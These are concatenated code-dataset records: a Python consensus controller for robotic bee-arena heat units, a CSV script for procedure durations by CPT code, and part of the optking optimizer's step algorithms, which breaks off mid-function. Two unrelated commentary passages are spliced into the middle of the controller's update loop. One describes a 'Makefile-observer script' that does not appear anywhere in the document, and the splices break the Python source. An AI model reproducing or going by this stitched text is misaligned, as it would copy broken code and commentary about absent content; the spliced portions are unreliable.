csv.writer(self.logfile, delimiter=';')\n\n    def calibrate_ir_thresholds(self, margin = 500, duration = 5):\n\n        self.casu.set_diagnostic_led_rgb(r=1)\n\n        t_start = time.time()\n        count = 0\n        ir_raw_buffers = [[0],[0],[0],[0],[0],[0]]\n        while time.time() - t_start < duration:\n            ir_raw = self.casu.get_ir_raw_value(casu.ARRAY)\n            for val,buff in zip(ir_raw,ir_raw_buffers):\n                buff.append(val)\n            time.sleep(0.1)\n\n        self.ir_thresholds = [max(buff)+margin for buff in ir_raw_buffers]\n        print(self.casu.name(), self.ir_thresholds)\n\n        self.casu.diagnostic_led_standby()\n\n    def update(self):\n        t_old = self.t_prev\n        self.t_prev = time.time()\n        #print(self.casu.name(),self.t_prev - t_old)\n\n        casu_id = self.consensus.casu_id\n\n        # Hack for testing: override the measured estimate with fixed values\n        numbees_fake = [0,3,0,0,0,0,0,0,6]\n        self.update_numbees_estimate()\n        numbees = sum(self.numbees)/float(len(self.numbees))\n        numbees = numbees_fake[casu_id-1]\n        #print(self.casu.name(),numbees)\n\n        # Compute one step of the algorithm\n        self.consensus.step(numbees,0.1)\n\n        # Set temperature reference\n        self.casu.set_temp(self.consensus.t_ref[casu_id-1])\n\n        # Communicate with neighbors\n        for nbg in self.casu._Casu__neighbors:\n            self.casu.send_message(nbg,json.dumps(self.consensus.zeta[-1][casu_id-1])\n                                   + ';' + str(self.consensus.t_ref[casu_id-1]))\n\n        # Update data buffer with messages from all neighbors\n        # We wait here until we have at least one message from every neighbor\n        updated_all = False\n        while not updated_all:\n            msg = self.casu.read_message()\n            if msg:\n                nbg_id = int(msg['sender'][-3:])\n                self.nbg_data_buffer[nbg_id].append(msg['data'])\n                # Check if we now have at least one message from each neighbor\n                updated_all = True\n                for nbg in self.nbg_data_buffer:\n                    if not self.nbg_data_buffer[nbg]:\n                        updated_all = False\n        \n        
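The Makefile-observer script that ends above turns configurable message templates such as `Makefile:${line_num}: recipe for target '${target_name}' failed` into regular expressions by escaping a few metacharacters by hand. A sketch of the same idea using `re.escape`, which covers all metacharacters; the helper name is made up:

```python
import re

def template_to_regex(template, placeholders):
    # Escape the literal parts, then turn each ${name} into a capture group.
    pattern = re.escape(template)
    for name in placeholders:
        pattern = pattern.replace(re.escape('${%s}' % name), '(.+)')
    return re.compile(pattern)

line_num_msg = "Makefile:${line_num}: recipe for target '${target_name}' failed"
regex = template_to_regex(line_num_msg, ['line_num', 'target_name'])
match = regex.search("Makefile:42: recipe for target 'all' failed")
print(match.group(1), match.group(2))  # -> 42 all
```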
\n # We got at least one message from every neighbor\n # We can now update our zeta\n for nbg_id in self.nbg_data_buffer:\n #print(self.casu.name(), nbg, ['%.3f' % z for z in self.consensus.zeta[-1][nbg-1]]) \n #print(self.casu.name(), nbg, self.consensus.t_ref) \n data = self.nbg_data_buffer[nbg_id].pop(0).split(';')\n rec_nbg_zeta = json.loads(data[0])\n rec_nbg_temp = float(data[1])\n self.consensus.zeta[-1][nbg_id -1] = deepcopy(rec_nbg_zeta)\n self.consensus.t_ref[nbg_id-1] = rec_nbg_temp\n# if self.casu.name() == 'casu-006':\n# print('zeta c6', casu_sender, ['%.3f' % z for z in self.consensus.zeta[-1][int(casu_sender[-3:])-1]])\n\n # Log zeta\n self.logger.writerow([time.time()] + [z for row in self.consensus.zeta[-1] for z in row])\n \n print(self.casu.name(),['%.3f' % z for z in self.consensus.zeta[-1][self.consensus.casu_id-1]], 'T_ref=', ['%.1f' % y for y in self.consensus.t_ref], numbees)\n #print(self.casu.name(),['%.3f' % z for z in self.consensus.zeta[-1][self.consensus.casu_id-1]], 'T_ref=', ['%.1f' % y for y in self.consensus.t_ref], 'nb=', numbees)\n #print(self.casu.name(),['%.3f' % z for z in self.consensus.zeta[-1][self.consensus.casu_id-1]],casu_sender,['%.3f' % z for z in rec_nbg_zeta])\n\n\n def run(self):\n # Just call update every Td\n while not self.stop_flag.wait(self.Td):\n self.update()\n\n # Turn off heating\n self.casu.temp_standby()\n print('Turned off heater, exiting...')\n\n def update_numbees_estimate(self):\n \"\"\"\n Bee density estimator.\n \"\"\"\n self.numbees.append(sum([x>t for (x,t) in zip(self.casu.get_ir_raw_value(casu.ARRAY),\n self.ir_thresholds)]))\n if len(self.numbees) > self.nb_buf_len:\n self.numbees.pop(0)\n\n\nif __name__ == '__main__':\n\n assert(len(sys.argv) > 1)\n\n rtc = sys.argv[1]\n \n # Parse rtc file name to get CASU id\n # assumes casu-xxx.rtc file name format\n casu_id = int(rtc[-7:-4])\n\n # Initialize consensus algorithm\n a1 = 0\n a = 0.1\n a2 = 0\n zeta = [[[a1, a, a2, a, a2, a2, a2, a2, a2], \n [a, a1, a, a2, a, a2, a2, a2, a2],\n [a2, a, a1, a2, a2, a, a2, a2, a2],\n [a, a2, a2, a1, a, a2, a, a2, a2],\n [a2, a, a2, a, a1, a, a2, a, a2], \n [a2, a2, a, a2, a, a1, a2, a2, a],\n [a2, a2, a2, a, a2, a2, a1, a, a2],\n [a2, a2, a2, a2, a, a2, a, a1, a],\n [a2, a2, a2, a2, a2, a, a2, a, a1]]] \n\n# zeta = [[[0,0.1,0.1,0],\n# [0.1,0,0,0.1],\n# [0.1,0,0,0.1],\n# [0,0.1,0.1,0]]]\n\n # Adjecency matrix\n A = [[0, 1, 0, 1, 0, 0, 0, 0, 0], \n [1, 0, 1, 0, 1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 1, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 1, 0, 0],\n [0, 1, 0, 1, 0, 1, 0, 1, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 1],\n [0, 0, 0, 1, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 1, 0, 1, 0, 1],\n [0, 0, 0, 0, 0, 1, 0, 1, 0]]\n\n# A = [[0,1,1,0],\n# [1,0,0,1],\n# [1,0,0,1],\n# [0,1,1,0]]\n\n ca = ConsensusAlgorithm(casu_id,zeta,A)\n ctrl = ConsensusController(rtc, ca, log=True)\n ctrl.calibrate_ir_thresholds()\n #ctrl.run()\n\n \n \n","sub_path":"heat_aggregation_consensus/controllers/heat_aggregation_consensus.py","file_name":"heat_aggregation_consensus.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"393138145","text":"\"\"\"Write a .csv file that allows us to easily make a box plot\r\nof the duration of the most common CPT code combinations.\r\n\"\"\"\r\nimport srdata\r\nimport csv\r\n\r\nXML_FILE_NAME = 'all bjh.xml'\r\nCPT_FILE_NAMES = CPT_FILE_NAMES = ['./GetCPT Data/April_Output_Org.xls', './GetCPT Data/May_Output_Org.xls']\r\n\r\n\r\ndef main():\r\n\tprocs = 
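The controller above delegates the actual zeta update to the imported ConsensusAlgorithm, which is not shown in this record. As a rough illustration only, here is a toy discrete-time averaging consensus over the same kind of adjacency matrix; the weights, step size and values are assumptions, not the experiment's dynamics:

```python
import numpy as np

# 3-node path graph; each node starts from its own local measurement.
A = np.array([[0, 1, 0],
              [1, 0, 1],
              [0, 1, 0]])
x = np.array([0.0, 3.0, 6.0])      # e.g. local bee-count estimates
eps = 0.25                         # step size, must be < 1 / max degree

L = np.diag(A.sum(axis=1)) - A     # graph Laplacian
for _ in range(50):
    x = x - eps * (L @ x)          # x_i += eps * sum_j A_ij * (x_j - x_i)

print(x)                           # every entry approaches the mean, 3.0
```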
srdata.process_file(XML_FILE_NAME, CPT_FILE_NAMES)\r\n\t#sort the procedures by their CPT code combinations\r\n\tprocs_by_cpt = {}\r\n\tfor proc in procs:\r\n\t\tif not proc.get_cpts() in procs_by_cpt:\r\n\t\t\tprocs_by_cpt[proc.get_cpts()] = []\r\n\t\tprocs_by_cpt[proc.get_cpts()].append(proc)\r\n\t#write a table of CPT code combinations followed by all the durations of the associated procedures\r\n\ttable = []\r\n\tfor (cpts, proc_list) in procs_by_cpt.iteritems():\r\n\t\trow_header = \"'\" +','.join([str(x) for x in cpts])\r\n\t\trow = [row_header] + [proc.get_duration() for proc in proc_list if not proc.get_duration() is None]\r\n\t\tif len(row)>4:\r\n\t\t\ttable.append(row)\r\n\twriter = csv.writer(open('output.csv','wb'))\r\n\twriter.writerows(table)\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"unported scripts/plot_duration.py","file_name":"plot_duration.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"390211931","text":"# Functions for step algorithms: Newton-Raphson, Rational Function Optimization,\n# Steepest Descent.\n# from .OptParams import Params # this will not cause changes in trust to persist\nimport logging\nfrom math import fabs, sqrt\n\nimport numpy as np\n\nfrom . import optimize\nfrom . import optparams as op\nfrom . import v3d\nfrom .addIntcos import linear_bend_check\nfrom .displace import displace_molsys\nfrom .exceptions import AlgError, OptError\nfrom .history import oHistory\nfrom .linearAlgebra import abs_max, asymm_mat_eig, norm, symm_mat_eig, symm_mat_inv\nfrom .misc import is_dq_symmetric\nfrom .printTools import print_array_string, print_mat_string\n\n\ndef take_step(o_molsys, E, q_forces, H, stepType=None, computer=None, hist=None, params=None):\n \"\"\"This method computes the step, calls displaces the geometry and updates history with\n the results.\n\n Parameters\n ----------\n o_molsys : molsys.Molsys\n optking's molecular system\n E : double\n energy [aO]\n q_forces : ndarray\n forces in internal coordinates [aO]\n H : ndarray\n hessian in internal coordinates\n stepType : string, optional\n defaults to stepType in options\n computer : computeWrapper, optional\n hist : history.History object\n\n Returns\n -------\n np.ndarray\n dispalcement in internals\n\n Notes\n -----\n step_grad and step_hess are the gradient and hessian in the direction of the step.\n\n \"\"\"\n if hist is None:\n hist = oHistory\n if params is None:\n params = op.Params\n logger = logging.getLogger(__name__)\n\n if len(H) == 0 or len(q_forces) == 0:\n logger.warning(\"Missing Hessian or Forces. 
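The grouping idiom in the plot_duration script above (a dict of lists keyed by the CPT code tuple, with an explicit membership test) has a shorter modern spelling; the sample tuples and durations below are made up:

```python
from collections import defaultdict

procs = [('99213',), ('99213',), ('99214', '99215')]  # CPT combinations
durations = [30, 45, 60]

by_cpt = defaultdict(list)
for cpts, dur in zip(procs, durations):
    by_cpt[cpts].append(dur)       # a tuple of codes is a valid dict key

for cpts, durs in by_cpt.items():  # Python 3 spelling of iteritems()
    print(','.join(cpts), durs)
```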
Step is 0\")\n return np.zeros(0)\n\n if not stepType:\n stepType = params.step_type\n\n if stepType == \"NR\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_nr(q_forces, H)\n elif stepType == \"RFO\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_rfo(o_molsys, q_forces, H)\n elif stepType == \"SD\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_sd(q_forces)\n elif stepType == \"BACKSTEP\":\n return dq_backstep(o_molsys) # Do an early quit Back step takes care of history and displacing\n elif stepType == \"P_RFO\":\n delta_E_projected, dq, unit_step, step_grad, step_hess = dq_p_rfo(q_forces, H)\n elif stepType == \"LINESEARCH\":\n # achieved_dq already back\n delta_E_projected, achieved_dq, unit_step, step_grad, step_hess = dq_linesearch(\n o_molsys, E, q_forces, H, computer\n )\n else:\n raise OptError(\"Dq: step type not yet implemented\")\n\n if stepType != \"LINESEARCH\":\n # linesearch performs multiple displacements in order to calculate energies\n o_molsys.interfrag_dq_discontinuity_correction(dq)\n achieved_dq = displace_molsys(o_molsys, dq, q_forces)\n\n dq_norm = np.linalg.norm(achieved_dq)\n logger.info(\"\\tNorm of achieved step-size %15.10f\" % dq_norm)\n\n hist.append_record(delta_E_projected, achieved_dq, unit_step, step_grad, step_hess)\n\n linearList = linear_bend_check(o_molsys, achieved_dq)\n if linearList:\n raise AlgError(\"New linear angles\", newLinearBends=linearList)\n\n # Before quitting, make sure step is reasonable. It should only be\n # screwball if we are using the \"First Guess\" after the back-transformation failed.\n dq_norm = np.linalg.norm(achieved_dq[0 : o_molsys.num_intrafrag_intcos])\n if dq_norm > 5 * params.intrafrag_trust:\n raise AlgError(\"opt.py: Step is far too large.\")\n\n return achieved_dq\n\n\n# TODO this method was described as crude do we need to revisit?\ndef apply_intrafrag_step_scaling(dq):\n \"\"\" Apply maximum step limit by scaling.\"\"\"\n logger = logging.getLogger(__name__)\n trust = op.Params.intrafrag_trust\n if sqrt(np.dot(dq, dq)) > trust:\n scale = trust / sqrt(np.dot(dq, dq))\n logger.info(\"\\tStep length exceeds trust radius of %10.5f.\" % trust)\n logger.info(\"\\tScaling displacements by %10.5f\" % scale)\n dq *= scale\n return\n\n\ndef de_projected(model, step, grad, hess):\n \"\"\" Compute anticpated energy change along one dimension \"\"\"\n if model == \"NR\":\n return step * grad + 0.5 * step * step * hess\n elif model == \"RFO\":\n return (step * grad + 0.5 * step * step * hess) / (1 + step * step)\n else:\n raise OptError(\"de_projected does not recognize model.\")\n\n\ndef dq_nr(fq, H):\n \"\"\"Takes a step according to Newton Raphson algorithm\n\n Parameters\n ----------\n o_molsys : molsys.Molsys\n optking molecular system\n E : double\n energy\n fq : ndarray\n forces in internal coordiantes\n H : ndarray\n hessian in internal coordinates\n\n Notes\n -----\n Presently, the attempted dq is stored in history not the\n actual dq from the backtransformation\n\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.info(\"\\tTaking NR optimization step.\")\n\n # Hinv fq = dq\n Hinv = symm_mat_inv(H, redundant=True)\n dq = np.dot(Hinv, fq)\n\n # applies maximum internal coordinate change\n apply_intrafrag_step_scaling(dq)\n\n # get norm |q| and unit vector in the step direction\n nr_dqnorm = sqrt(np.dot(dq, dq))\n nr_u = dq / nr_dqnorm\n logger.info(\"\\tNorm of target step-size %15.10lf\" % nr_dqnorm)\n\n # get gradient and hessian in step direction\n nr_g = -1 * 
np.dot(fq, nr_u) # gradient, not force\n nr_h = np.dot(nr_u, np.dot(H, nr_u))\n\n if op.Params.print_lvl > 1:\n logger.info(\"\\tNR target step|: %15.10f\" % nr_dqnorm)\n logger.info(\"\\tNR_gradient: %15.10f\" % nr_g)\n logger.info(\"\\tNR_hessian: %15.10f\" % nr_h)\n DEprojected = de_projected(\"NR\", nr_dqnorm, nr_g, nr_h)\n logger.debug(\"\\tProjected energy change by quadratic approximation: %10.10lf\\n\" % DEprojected)\n\n return DEprojected, dq, nr_u, nr_g, nr_h\n\n\n# Take Rational Function Optimization step\ndef dq_rfo(oMolsys, fq, H):\n \"\"\"Takes a step using Rational Function Optimization\n\n Parameters\n ----------\n oMolsys : molsys.Molsys\n optking molecular system\n E : double\n energy\n fq : ndarray\n forces in internal coordinates\n H : ndarray\n hessian in internal coordinates\n\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.debug(\"\\tTaking RFO optimization step.\")\n dim = len(fq)\n dq = np.zeros(dim) # To be determined and returned.\n\n # Build the original, unscaled RFO matrix.\n RFOmat = np.zeros((dim + 1, dim + 1))\n for i in range(dim):\n for j in range(dim):\n RFOmat[i, j] = H[i, j]\n RFOmat[i, dim] = RFOmat[dim, i] = -fq[i]\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tOriginal, unscaled RFO matrix:\\n\\n\" + print_mat_string(RFOmat))\n\n converged, dq = apply_alpha_step_scaling(RFOmat, H, dq, fq, dim, oMolsys)\n\n # Crude/old way to limit step size if RS-RFO iterations\n if not converged or op.Params.simple_step_scaling:\n apply_intrafrag_step_scaling(dq)\n\n if op.Params.print_lvl >= 3:\n logger.debug(\"\\tFinal scaled step dq:\\n\\n\\t\" + print_array_string(dq))\n\n # Get norm |dq|, unit vector, gradient and hessian in step direction\n # TODO double check Hevects[i] here instead of H ? as for NR\n rfo_dqnorm = sqrt(np.dot(dq, dq))\n logger.info(\"\\tNorm of target step-size: %15.10f\\n\" % rfo_dqnorm)\n rfo_u = dq / rfo_dqnorm\n rfo_g = -1 * np.dot(fq, rfo_u)\n rfo_h = np.dot(rfo_u, np.dot(H, rfo_u))\n DEprojected = de_projected(\"RFO\", rfo_dqnorm, rfo_g, rfo_h)\n if op.Params.print_lvl > 1:\n logger.info(\"\\tRFO target step = %15.10f\" % rfo_dqnorm)\n logger.info(\"\\tRFO gradient = %15.10f\" % rfo_g)\n logger.info(\"\\tRFO hessian = %15.10f\" % rfo_h)\n logger.debug(\"\\tProjected energy change by RFO approximation %15.5f\\n\" % DEprojected)\n\n return DEprojected, dq, rfo_u, rfo_g, rfo_h\n\n\ndef apply_alpha_step_scaling(RFOmat, H, dq, fq, dim, oMolsys):\n \"\"\"Iterative process to determine alpha step scaling parameter\"\"\"\n\n logger = logging.getLogger(__name__)\n SRFOmat = np.zeros((dim + 1, dim + 1)) # For scaled RFO matrix.\n converged = False\n alpha = 1.0 # scaling factor for RS-RFO, scaling matrix is sI\n alphaIter = -1\n max_projected_rfo_iter = 25 # max. # of iterations to try to converge RS-RFO\n rfo_follow_root = op.Params.rfo_follow_root # whether to follow root\n rfo_root = op.Params.rfo_root # if following, which root to follow\n trust = op.Params.intrafrag_trust # maximum step size\n\n # Determine the eigenvectors/eigenvalues of H.\n Hevals, Hevects = symm_mat_eig(H)\n\n last_iter_evect = np.zeros(dim)\n if rfo_follow_root and len(oHistory.steps) > 1:\n last_iter_evect[:] = oHistory.steps[-2].followedUnitVector # RFO vector from previous geometry step\n rfo_step_report = ''\n\n while not converged and alphaIter < max_projected_rfo_iter:\n alphaIter += 1\n\n # If we exhaust iterations without convergence, then bail on the\n # restricted-step algorithm. 
Set alpha=1 and apply crude scaling instead.\n if alphaIter == max_projected_rfo_iter:\n logger.warning(\"\\tFailed to converge alpha. Doing simple step-scaling instead.\")\n alpha = 1.0\n elif op.Params.simple_step_scaling:\n # Simple_step_scaling is on, not an iterative method.\n # Proceed through loop with alpha == 1, and then continue\n alphaIter = max_projected_rfo_iter\n\n # Scale the RFO matrix.\n for i in range(dim + 1):\n for j in range(dim):\n SRFOmat[j, i] = RFOmat[j, i] / alpha\n SRFOmat[dim, i] = RFOmat[dim, i]\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tScaled RFO matrix.\\n\\n\" + print_mat_string(SRFOmat))\n\n # Find the eigenvectors and eigenvalues of RFO matrix.\n SRFOevals, SRFOevects = asymm_mat_eig(SRFOmat)\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tEigenvectors of scaled RFO matrix.\\n\\n\" + print_mat_string(SRFOevects))\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tEigenvalues of scaled RFO matrix.\\n\\n\\t\" + print_array_string(SRFOevals))\n logger.debug(\n \"\\tFirst eigenvector (unnormalized) of scaled RFO matrix.\\n\\n\\t\" + print_array_string(SRFOevects[0])\n )\n\n # Do intermediate normalization. RFO paper says to scale eigenvector\n # to make the last element equal to 1. Bogus evect leads can be avoided\n # using root following.\n for i in range(dim + 1):\n # How big is dividing going to make the largest element?\n # Same check occurs below for acceptability.\n if fabs(SRFOevects[i][dim]) > 1.0e-10:\n tval = abs_max(SRFOevects[i] / SRFOevects[i][dim])\n if tval < op.Params.rfo_normalization_max:\n for j in range(dim + 1):\n SRFOevects[i, j] /= SRFOevects[i, dim]\n\n if op.Params.print_lvl >= 4:\n logger.debug(\"\\tAll scaled RFO eigenvectors (rows).\\n\\n\" + print_mat_string(SRFOevects))\n\n # Use input rfo_root\n # If root-following is turned off, then take the eigenvector with the\n # rfo_root'th lowest eigvenvalue. If its the first iteration, then do the same.\n # In subsequent steps, overlaps will be checked.\n if not rfo_follow_root or len(oHistory.steps) < 2:\n\n # Determine root only once at beginning ?\n if alphaIter == 0:\n logger.debug(\"\\tChecking RFO solution %d.\" % (rfo_root + 1))\n\n rfo_root = find_rfo_root(rfo_root, SRFOevects, oMolsys, dim, dq)\n\n # Save initial root. 'Follow' during the RS-RFO iterations.\n rfo_follow_root = True\n\n else: # Do root following.\n # Find maximum overlap. 
Dot only within H block.\n dots = np.array(\n [v3d.dot(SRFOevects[i], last_iter_evect, dim) for i in range(dim)],\n float,\n )\n bestfit = np.argmax(dots)\n if bestfit != rfo_root:\n logger.info(\"\\tRoot-following has changed rfo_root value to %d.\" % (bestfit + 1))\n rfo_root = bestfit\n\n if alphaIter == 0:\n logger.info(\"\\tUsing RFO solution %d.\" % (rfo_root + 1))\n last_iter_evect[:] = SRFOevects[rfo_root][0:dim] # omit last column on right\n\n # Print only the lowest eigenvalues/eigenvectors\n if op.Params.print_lvl >= 2:\n logger.info(\"\\trfo_root is %d\" % (rfo_root + 1))\n for i in range(dim + 1):\n if SRFOevals[i] < -1e-6 or i < rfo_root:\n eigen_val_vec = \"\\n\\tScaled RFO eigenvalue %d:\\n\\t%15.10lf (or 2*%-15.10lf)\\n\" % (\n i + 1,\n SRFOevals[i],\n SRFOevals[i] / 2,\n )\n eigen_val_vec += \"\\n\\teigenvector:\\n\\t\"\n eigen_val_vec += print_array_string(SRFOevects[i])\n logger.info(eigen_val_vec)\n dq[:] = SRFOevects[rfo_root][0:dim] # omit last column\n\n # Project out redundancies in steps.\n # Added this projection in 2014; but doesn't seem to help, as f,H are already projected.\n # project_dq(dq);\n # zero steps for frozen coordinates?\n\n dqtdq = np.dot(dq, dq)\n # If alpha explodes, give up on iterative scheme\n if fabs(alpha) > op.Params.rsrfo_alpha_max:\n converged = False\n alphaIter = max_projected_rfo_iter - 1\n elif sqrt(dqtdq) < (trust + 1e-5):\n converged = True\n\n if alphaIter == 0 and not op.Params.simple_step_scaling:\n logger.debug(\"\\tDetermining step-restricting scale parameter for RS-RFO.\")\n\n if alphaIter == 0:\n rfo_step_report += (\n \"\\n\\n\\t Iter |step| alpha rfo_root\"\n + \"\\n\\t------------------------------------------------\"\n + \"\\n\\t%5d%12.5lf%14.5lf%12d\\n\" % (alphaIter + 1, sqrt(dqtdq), alpha, rfo_root + 1)\n )\n\n elif alphaIter > 0 and not op.Params.simple_step_scaling:\n rfo_step_report += \"\\t%5d%12.5lf%14.5lf%12d\\n\" % (\n alphaIter + 1,\n sqrt(dqtdq),\n alpha,\n rfo_root + 1,\n )\n\n # Find the analytical derivative, d(norm step squared) / d(alpha)\n # rfo_step_report += (\"\\t------------------------------------------------\\n\")\n\n Lambda = -1 * v3d.dot(fq, dq, dim)\n if op.Params.print_lvl >= 2:\n disp_forces = \"\\tDisplacement and Forces\\n\\n\"\n disp_forces += \"\\tDq:\" + print_array_string(dq, dim)\n disp_forces += \"\\tFq:\" + print_array_string(fq, dim)\n logger.info(disp_forces)\n logger.info(\"\\tLambda calculated by (dq^t).(-f) = %15.10lf\\n\" % Lambda)\n\n # Calculate derivative of step size wrt alpha.\n tval = 0\n for i in range(dim):\n tval += (pow(v3d.dot(Hevects[i], fq, dim), 2)) / (pow((Hevals[i] - Lambda * alpha), 3))\n\n analyticDerivative = 2 * Lambda / (1 + alpha * dqtdq) * tval\n if op.Params.print_lvl >= 2:\n rfo_step_report += \"\\t Analytic derivative d(norm)/d(alpha) = %15.10lf\\n\" % analyticDerivative\n # + \"\\n\\t------------------------------------------------\\n\")\n\n # Calculate new scaling alpha value.\n # Equation 20, Besalu and Bofill, Theor. Chem. 
Acc., 1998, 100:265-274\n alpha += 2 * (trust * sqrt(dqtdq) - dqtdq) / analyticDerivative\n\n # end alpha RS-RFO iterations\n logger.debug(rfo_step_report)\n return converged, dq\n\ndef find_rfo_root(rfo_root, SRFOevects, oMolsys, dim, dq):\n\n logger = logging.getLogger(__name__)\n\n for i in range(rfo_root, dim + 1):\n # Check symmetry of root.\n dq[:] = SRFOevects[i, 0:dim]\n if not op.Params.accept_symmetry_breaking:\n symm_rfo_step = is_dq_symmetric(oMolsys, dq)\n\n if not symm_rfo_step: # Root is assymmetric so reject it.\n logger.warning(\n \"\\tRejecting RFO root %d because it breaks \\\n the molecular point group.\"\n % (rfo_root + 1)\n )\n continue\n\n # Check normalizability of root.\n if fabs(SRFOevects[i][dim]) < 1.0e-10: # don't even try to divide\n logger.warning(\n \"\\tRejecting RFO root %d because normalization \\\n gives large value.\"\n % (rfo_root + 1)\n )\n continue\n tval = abs_max(SRFOevects[i] / SRFOevects[i][dim])\n if tval > op.Params.rfo_normalization_max: # matching test in code above\n logger.warning(\n \"\\tRejecting RFO root %d because normalization \\\n gives large value.\"\n % (rfo_root + 1)\n )\n continue\n rfo_root = i # This root is acceptable.\n break\n else:\n rfo_root = op.Params.rfo_root\n # no good root found, using the default\n\n return rfo_root\n\ndef dq_p_rfo(fq, H):\n logger = logging.getLogger(__name__)\n hdim = len(fq) # size of Hessian\n trust = op.Params.intrafrag_trust # maximum step size\n # rfo_follow_root = op.Params.rfo_follow_root # whether to follow root\n # rfo follow root is not currently implemented\n print_lvl = op.Params.print_lvl\n\n if print_lvl > 2:\n logger.info(\"\\tHessian matrix\\n\" + print_mat_string(H))\n\n # Diagonalize H (technically only have to semi-diagonalize)\n h_eig_values, h_eig_vectors = symm_mat_eig(H)\n\n if print_lvl > 2:\n logger.info(\"\\tEigenvalues of Hessian\\n\\n\\t\" + print_array_string(h_eig_values))\n logger.info(\"\\tEigenvectors of Hessian (rows)\\n\" + print_mat_string(h_eig_vectors))\n\n # Construct diagonalized Hessian with evals on diagonal\n\n hess_diag = np.diag(h_eig_values)\n\n if print_lvl > 2:\n logger.info(\"\\tH diagonal\\n\" + print_mat_string(hess_diag))\n\n logger.debug(\"\\tFor P-RFO, assuming rfo_root=1, maximizing along lowest eigenvalue of Hessian.\")\n logger.debug(\"\\tLarger values of rfo_root are not yet supported.\")\n\n rfo_root = 0\n \"\"\" TODO: use rfo_root to decide which eigenvectors are moved into the max/mu space.\n if not rfo_follow_root or len(oHistory.steps) < 2:\n rfo_root = op.Params.rfo_root\n printxopt(\"\\tMaximizing along %d lowest eigenvalue of Hessian.\\n\" % (rfo_root+1) )\n else:\n last_iter_evect = history[-1].Dq\n dots = np.array([v3d.dot(h_eig_vectors[i],last_iter_evect,hdim) for i in range(hdim)], float)\n rfo_root = np.argmax(dots)\n printxopt(\"\\tOverlaps with previous step checked for root-following.\\n\")\n printxopt(\"\\tMaximizing along %d lowest eigenvalue of Hessian.\\n\" % (rfo_root+1) )\n \"\"\"\n\n # number of degrees along which to maximize; assume 1 for now\n mu = 1\n\n logger.info(\"\\tInternal forces in au:\\n\\n\\t\" + print_array_string(fq))\n\n fqTransformed = np.dot(h_eig_vectors, fq) # gradient transformation\n logger.info(\"\\tInternal forces in au, in Hevect basis:\\n\\n\\t\" + print_array_string(fqTransformed))\n # Build RFO max\n # Lowest eigenvalue of hessian augmented with corresponding gradient components\n\n maximize_rfo = np.zeros((mu + 1, mu + 1))\n maximize_rfo[:mu, :mu] = hess_diag[:mu, :mu]\n maximize_rfo[:mu, 
-1] = maximize_rfo[-1, :mu] = -fqTransformed[:mu]\n\n if print_lvl > 2:\n logger.info(\"\\tRFO max\\n\" + print_mat_string(maximize_rfo))\n\n # Build RFO min\n # All remaining hessian eigenvalues augmented with gradient\n\n minimize_rfo = np.zeros((hdim - mu + 1, hdim - mu + 1))\n minimize_rfo[: hdim - mu, : hdim - mu] = hess_diag[mu:, mu:]\n minimize_rfo[: hdim - mu, -1] = minimize_rfo[-1, : hdim - mu] = -fqTransformed[mu:hdim]\n\n if print_lvl > 2:\n logger.info(\"\\tRFO min\\n\" + print_mat_string(minimize_rfo))\n\n RFOMaxEValues, RFOMaxEVectors = symm_mat_eig(maximize_rfo)\n RFOMinEValues, RFOMinEVectors = symm_mat_eig(minimize_rfo)\n\n logger.info(\"\\tRFO min eigenvalues:\\n\\n\\t\" + print_array_string(RFOMinEValues))\n logger.info(\"\\tRFO max eigenvalues:\\n\\n\\t\" + print_array_string(RFOMaxEValues))\n\n if print_lvl > 2:\n logger.info(\"\\tRFO min eigenvectors (rows) before normalization:\\n\" + print_mat_string(RFOMinEVectors))\n logger.info(\"\\tRFO max eigenvectors (rows) before normalization:\\n\" + print_mat_string(RFOMaxEVectors))\n\n # Normalize max and min eigenvectors\n for i in range(mu + 1):\n if abs(RFOMaxEVectors[i, mu]) > 1.0e-10:\n tval = abs(abs_max(RFOMaxEVectors[i, 0:mu]) / RFOMaxEVectors[i, mu])\n if fabs(tval) < op.Params.rfo_normalization_max:\n RFOMaxEVectors[i] /= RFOMaxEVectors[i, mu]\n if print_lvl > 2:\n logger.info(\"\\tRFO max eigenvectors (rows):\\n\" + print_mat_string(RFOMaxEVectors))\n\n for i in range(hdim - mu + 1):\n if abs(RFOMinEVectors[i][hdim - mu]) > 1.0e-10:\n tval = abs(abs_max(RFOMinEVectors[i, 0 : hdim - mu]) / RFOMinEVectors[i, hdim - mu])\n if fabs(tval) < op.Params.rfo_normalization_max:\n RFOMinEVectors[i] /= RFOMinEVectors[i, hdim - mu]\n if print_lvl > 2:\n logger.info(\"\\tRFO min eigenvectors (rows):\\n\" + print_mat_string(RFOMinEVectors))\n\n VectorP = RFOMaxEVectors[mu, 0:mu]\n VectorN = RFOMinEVectors[rfo_root, 0 : hdim - mu]\n logger.debug(\"\\tVector P\\n\\n\\t\" + print_array_string(VectorP))\n logger.debug(\"\\tVector N\\n\\n\\t\" + print_array_string(VectorN))\n\n # Combines the eignvectors from RFO max and min\n prfoe_vector = np.zeros(hdim)\n prfoe_vector[0 : len(VectorP)] = VectorP\n prfoe_vector[len(VectorP) :] = VectorN\n\n prfo_step = np.dot(h_eig_vectors.transpose(), prfoe_vector)\n\n if print_lvl > 1:\n logger.info(\"\\tRFO step in Hessian Eigenvector Basis\\n\\n\\t\" + print_array_string(prfoe_vector))\n logger.info(\"\\tRFO step in original Basis\\n\\n\\t\" + print_array_string(prfo_step))\n\n dq = prfo_step\n\n # if not converged or op.Params.simple_step_scaling:\n apply_intrafrag_step_scaling(dq)\n\n # Get norm |dq|, unit vector, gradient and hessian in step direction\n # TODO double check Hevects[i] here instead of H 